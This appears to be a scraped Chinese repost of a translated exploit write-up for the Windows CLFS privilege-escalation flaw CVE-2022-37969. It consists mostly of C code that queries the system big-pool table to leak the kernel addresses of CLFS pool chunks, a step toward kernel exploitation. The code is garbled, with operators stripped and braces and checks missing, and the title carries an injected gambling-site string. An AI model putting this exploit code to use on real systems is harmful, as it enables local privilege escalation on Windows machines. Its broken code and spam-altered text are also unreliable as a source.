[翻译]windows clfs 提权漏洞 cve-ag真人国际厅网站

// systembigpoolinformation

 

int getbigpoolinfo(puint64 _a2)

    uint64 v7 = 0;

    uint v8 = 0; // counter

    uint64 v11 = 0;

    ulong retlen = 0;

    puint64 v15 = 0;

    ulong v4 = 0;

    dword* v5;

    uint v6 = 0;

 

    dword* v3 = (dword*)virtualalloc(0, 0x1000, 0x1000, 4);

    if (fnntquerysysteminformation(systembigpoolinformation, v3, 0x1000, &retlen) == 0xc0000004)

    {

        while (1)

        {

            virtualfree(v3, 0, 0x8000);

            v4 = retlen;

            v5 = (dword*)virtualalloc(0, (size_t)retlen, 0x1000, 4);

            {

                printf("[ ] error allocating memory\n");

                break;

            }

//fnntquerysysteminformation需要调用两次,第一次返回错误但会告诉我们调用第二次所需的正确缓冲区大小,以获取所需的信息。

            if (fnntquerysysteminformation(systembigpoolinformation, v5, v4, &retlen) != 0xc0000004)

            {//v5 = system_big_pool_information

                goto label_4;

            }

            else {

                break;

            }

 

        }

        //printf("[ ] error allocating memory\n");

    }

    else {

    label_4:

        v6 = (uint) * (puint)v3; // v6 is the field count on the system_bigpool_information

        //  printf("[ ] field count --> %x\n", v6);

 

        if (flag2 == 0) {

            kerneladdrarray = (puint64)malloc(v6 * 8);

            printf("kernel addresss array %p", kerneladdrarray);

            memset(kerneladdrarray, 0, (v6 * 8));

        }

 

        if (v6)

        {

            v9 = *p_num_of_clfs;

            v10 = (puint64)&v3[4 * v6 - 4 2 * v6];

            //      printf("[ ] last system big pool entry offset --> %p\n", v10); // offset to the last system_bigpool_entry

 

            do {

                v11 = *v10 & 0xfffffffffffffffe;

                //  printf("[ ] first field value of big pool entry structure, named virtual address --> %p\n", v11);

                if ((*v10 & 1) == 0)

                {

                    v11 = *v10;

                }

                if (v10[1] == 0x7a00// search for the clfs base log file size

                {

                    uint v12 = 0;

                    while (1)

                    {

                        char v13 = tag[v12 ];

                        if (v13 != *((byte*)v10 v12 15))

                        {

                            break;

                        }

 

                        if (v12 == 5) // tag clfs found !

                        {

                            uint v14 = 0;

 

                            if (v9 <= 0)

                            {

                            label_16:

                                uint v16 = v9 ;

                                kerneladdrarray[v16] = v11;

 

 

                                if (_a2)

                                {

                                     v8;

                                    *_a2 = v11;

                                }

//a2始终指向创建的带有clfs标记且大小为 0x7a00 的最后一个正确的池

                            }

                            else

                            {

                                v15 = kerneladdrarray;

                                while (*v15 != v11)

                                {

                                     v14;

                                     v15;

                                    if (v14 >= v9) {

                                        goto label_16;

                                    }

                                }

                            }

                            break;

                        }

 

                    }

                }

 

 

                 v7;

                v10 -= 3; // back 0x18 to previous system big pool entry to find the 0x7a00

            } while (v7 < v6); // it compares the counter against the field count of system_bigpool_information

 

            *p_num_of_clfs = v9;

        }

        //printf("[ ] variables: v8 = %x   v9 = %x\n", v8, v9);

        //printf("[ ] kernel addresses array --> %p\n", kerneladdrarray);

        if (_a2 && v8 == 0) {

            printf("[ ] not found available chunk\n");

        }

        virtualfree(v3, 0, 0x8000);

    }

    return 0;

原文链接:https://bbs.kanxue.com/thread-277554.htm

网络摘文,本文作者:15h,如若转载,请注明出处:https://www.15cov.cn/2023/08/27/翻译windows-clfs-提权漏洞-cve-2022-37969-漏洞利用/

发表评论

邮箱地址不会被公开。 必填项已用*标注

网站地图